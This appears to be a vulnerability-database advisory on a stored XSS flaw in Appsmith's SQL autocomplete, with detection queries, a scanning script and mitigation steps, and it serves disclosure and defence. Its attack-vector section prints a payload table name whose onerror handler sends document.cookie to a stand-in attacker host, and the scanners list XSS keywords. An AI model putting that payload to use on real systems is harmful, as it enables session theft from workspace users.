CVE Vulnerability Database

CVE-2026-7299: Appsmith SQL Editor XSS Vulnerability

CVE-2026-7299 is a persistent XSS vulnerability in Appsmith's SQL query editor autocomplete feature that allows developers to inject malicious code via database object names, affecting other workspace members.

Published:

CVE-2026-7299 Overview

CVE-2026-7299 is a stored cross-site scripting (XSS) vulnerability in Appsmith's SQL query editor. The autocomplete functionality renders database object names directly into the DOM through innerHTML without sanitization. An authenticated user with Developer privileges can create database tables or columns containing malicious payloads. When other workspace members open the same datasource, the autocomplete loads the poisoned identifiers and executes attacker-controlled JavaScript in their browser sessions.

Critical Impact

A Developer-level attacker can achieve persistent JavaScript execution against any workspace member who interacts with the affected datasource, enabling session theft, credential capture, and lateral movement within the Appsmith tenant.

Affected Products

  • Appsmith (low-code application platform)
  • Workspaces using SQL datasource connections with autocomplete enabled
  • Builds preceding the fix in commit 99d69180919981ed9bc5484050d809a5bec68acc

Discovery Timeline

  • 2026-06-02 - CVE-2026-7299 published to NVD
  • 2026-06-02 - Last updated in NVD database

Technical Details for CVE-2026-7299

Vulnerability Analysis

The flaw exists in the SQL query editor's autocomplete component. When a Developer connects a SQL datasource, Appsmith introspects the schema and lists tables and columns to assist query authoring. The frontend writes those identifier strings into the autocomplete dropdown using innerHTML rather than safe text APIs such as textContent. Because Appsmith does not escape angle brackets, quotes, or event-handler attributes, any HTML embedded in a table or column name is parsed and executed.

Exploitation requires the attacker to control table or column names in a connected database. A Developer can rename objects in databases they manage, or pivot through a previously compromised database. Once a poisoned identifier is stored, every workspace member who opens the query editor against that datasource triggers the payload. The XSS is persistent because the payload lives in the upstream database schema, not in Appsmith state.

Root Cause

The root cause is improper output encoding in a client-side rendering path [CWE-79]. Identifiers returned from datasource schema introspection are trusted and concatenated into HTML markup. There is no allowlist of identifier characters and no contextual escaping before insertion into the DOM.
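The rendering mistake described above, side by side with the contextual escaping that fixes it. This is an added illustration, not Appsmith's code or the vendor patch: the function names (renderHintUnsafe, renderHintSafe, escapeHtml, isPlainIdentifier) and the sample identifiers are constructed for the example.

```javascript
// Added example, not Appsmith's code: contrasts the vulnerable rendering pattern
// the advisory describes (identifier concatenated into markup destined for innerHTML)
// with contextual escaping. The identifiers are constructed test data.

// Escape the characters that can switch HTML parsing context. This is the
// minimum needed before untrusted text goes into element content or a
// double-quoted attribute; the vulnerable code path skips it entirely.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the schema-introspection result is trusted verbatim.
// Assigning this string to element.innerHTML lets the browser parse any
// tag or event-handler attribute hidden in a table or column name.
function renderHintUnsafe(identifier) {
  return `<li class="hint">${identifier}</li>`;
}

// Hardened pattern: escape at the sink. (In a live DOM the equivalent is
// li.textContent = identifier, which never invokes the HTML parser.)
function renderHintSafe(identifier) {
  return `<li class="hint">${escapeHtml(identifier)}</li>`;
}

// Defence in depth: identifiers outside this allowlist are legal SQL when
// quoted but rarely legitimate in practice, so flag them rather than render.
const IDENTIFIER_ALLOWLIST = /^[A-Za-z0-9_]+$/;
function isPlainIdentifier(identifier) {
  return IDENTIFIER_ALLOWLIST.test(identifier);
}

// Build the whole dropdown; `render` defaults to the safe variant.
function renderDropdown(identifiers, render = renderHintSafe) {
  return `<ul class="autocomplete">${identifiers.map(render).join('')}</ul>`;
}

// Constructed sample: one ordinary table name and one poisoned name.
const SAMPLE_IDENTIFIERS = ['orders', '<img src=x onerror=alert(1)>'];

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderDropdown(SAMPLE_IDENTIFIERS, renderHintUnsafe));
  console.log('safe:  ', renderDropdown(SAMPLE_IDENTIFIERS));
  console.log('flagged:', SAMPLE_IDENTIFIERS.filter((id) => !isPlainIdentifier(id)));
}
```

Run with node to see the two dropdown strings: the unsafe one carries a live img element with an onerror attribute, the safe one carries only text. The allowlist check is a second layer, not a substitute for escaping: the escaping is what removes the bug, the allowlist is what makes a poisoned schema visible.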

Attack Vector

The attack is network-reachable but requires authenticated Developer access and victim interaction with the query editor. An attacker executes a SQL statement such as CREATE TABLE "<img src=x onerror=fetch('//attacker/?c='+document.cookie)>" (id INT) against a datasource. When another workspace user opens the SQL editor for that connection, the autocomplete renders the crafted name, the browser parses the embedded element, and the onerror handler runs in the victim's authenticated session.

The payload executes with the victim's Appsmith privileges, allowing API calls, datasource credential disclosure through the running session, and modification of applications the victim can edit. See the public proof-of-concept for end-to-end details.

Detection Methods for CVE-2026-7299

Indicators of Compromise

  • Database tables or columns whose names contain <, >, script, onerror, onload, or javascript: substrings
  • Outbound HTTP requests from Appsmith user browsers to unrecognized domains shortly after opening a SQL query editor
  • Audit log entries showing schema-altering statements (CREATE TABLE, ALTER TABLE, RENAME) issued by Developer accounts against shared datasources

Detection Strategies

  • Query information_schema.tables and information_schema.columns in each connected database and flag identifiers containing HTML metacharacters.
  • Inspect browser Content Security Policy (CSP) violation reports generated by the Appsmith frontend for blocked inline script executions originating from the query editor route.
  • Review Appsmith server access logs for repeated schema-introspection calls correlated with non-Developer user sessions.
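The indicator and detection bullets above, applied to schema introspection output as a small scanner. This is an added example, not part of the advisory or any vendor tool; the rows are constructed sample data shaped like information_schema.columns, and the function names (classifyIdentifier, scanSchema) are assumptions for the example. It goes slightly beyond the bullets by separating hard indicators (HTML metacharacters) from noisy keyword hits and allowlist misses, so each tier can be routed differently.

```javascript
// Added example, not part of the advisory or any vendor tool: a scanner for
// schema-introspection output that applies three detection tiers.
// The rows below are constructed sample data shaped like
// information_schema.columns, not real output from a database.

// Characters that can change HTML parsing context, plus the javascript: scheme.
const HTML_META = /[<>"'&]|javascript:/i;
// Keywords from the indicators list; case-insensitive because HTML is.
const XSS_KEYWORDS = /script|onerror|onload/i;
// Conservative allowlist from the monitoring recommendations.
const PLAIN_IDENTIFIER = /^[A-Za-z0-9_]+$/;

// Returns 'high', 'medium', 'low' or null for a single identifier.
// 'medium' is deliberately noisy: a legitimate column named "description"
// contains "script", so it is queued for review rather than treated as an incident.
function classifyIdentifier(name) {
  if (HTML_META.test(name)) return 'high';
  if (XSS_KEYWORDS.test(name)) return 'medium';
  if (!PLAIN_IDENTIFIER.test(name)) return 'low';
  return null;
}

// Scan rows of { table_schema, table_name, column_name } and return findings,
// de-duplicated so a poisoned table name is reported once, not once per column.
function scanSchema(rows) {
  const findings = [];
  const seen = new Set();
  for (const row of rows) {
    for (const field of ['table_name', 'column_name']) {
      const name = row[field];
      if (typeof name !== 'string') continue;
      const severity = classifyIdentifier(name);
      if (!severity) continue;
      const key = `${row.table_schema}|${row.table_name}|${field}|${name}`;
      if (seen.has(key)) continue;
      seen.add(key);
      findings.push({ schema: row.table_schema, table: row.table_name, field, name, severity });
    }
  }
  return findings;
}

// Constructed sample rows: clean objects, a keyword false positive, a name
// outside the allowlist, and a poisoned table name seen across two columns.
const SAMPLE_ROWS = [
  { table_schema: 'public', table_name: 'orders', column_name: 'id' },
  { table_schema: 'public', table_name: 'orders', column_name: 'description' },
  { table_schema: 'public', table_name: 'order items', column_name: 'qty' },
  { table_schema: 'public', table_name: '<img src=x onerror=alert(1)>', column_name: 'id' },
  { table_schema: 'public', table_name: '<img src=x onerror=alert(1)>', column_name: 'note' },
  { table_schema: 'public', table_name: 'users', column_name: 'ONLOAD' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanSchema(SAMPLE_ROWS)) {
    console.log(`${f.severity.padEnd(6)} ${f.schema}.${f.table} ${f.field}=${JSON.stringify(f.name)}`);
  }
}
```

On the sample rows the scanner reports one high finding (the poisoned table, once), two medium hits (description and ONLOAD) and one low hit (the space in "order items"). Feed it the rows returned by the information_schema queries and alert only on the high tier; the other two are review queues.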

Monitoring Recommendations

  • Forward Appsmith application logs and reverse-proxy logs to a centralized analytics platform and alert on anomalous datasource access patterns.
  • Monitor egress traffic from workstations used by Appsmith editors for connections to domains absent from an approved allowlist.
  • Track changes to database schemas on datasources shared across workspaces and require review for identifier names outside [A-Za-z0-9_].

How to Mitigate CVE-2026-7299

Immediate Actions Required

  • Upgrade Appsmith to the release that includes commit 99d69180919981ed9bc5484050d809a5bec68acc from pull request #41666.
  • Audit all SQL datasources for table and column names containing HTML metacharacters and rename or drop offending objects.
  • Rotate session tokens and datasource credentials for any workspace where a poisoned identifier was observed.

Patch Information

The vendor fix sanitizes autocomplete output before DOM insertion. Apply the upstream patch referenced in the Appsmith security advisory GHSA-vvxf-f8q9-86gh and the corresponding commit. Additional coordination details are available in the CERT/CC advisory VU#265691.

Workarounds

  • Restrict Developer role assignments to trusted users until the patch is applied.
  • Limit shared datasources so that schema-altering privileges are not granted to Appsmith service accounts.
  • Enforce a strict Content Security Policy on the Appsmith frontend to block inline event handlers and unauthorized script sources.

```bash
# Identify suspicious identifiers in a connected PostgreSQL datasource.
# ~* makes the match case-insensitive (HTML tag and attribute names are);
# system schemas are skipped so only application objects are reported.
psql -h db.internal -U appsmith_ro -d app -c \
  "SELECT table_schema, table_name FROM information_schema.tables \
   WHERE table_schema NOT IN ('pg_catalog', 'information_schema') \
     AND table_name ~* '[<>\"'']|script|onerror|onload';"

psql -h db.internal -U appsmith_ro -d app -c \
  "SELECT table_schema, table_name, column_name FROM information_schema.columns \
   WHERE table_schema NOT IN ('pg_catalog', 'information_schema') \
     AND column_name ~* '[<>\"'']|script|onerror|onload';"
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
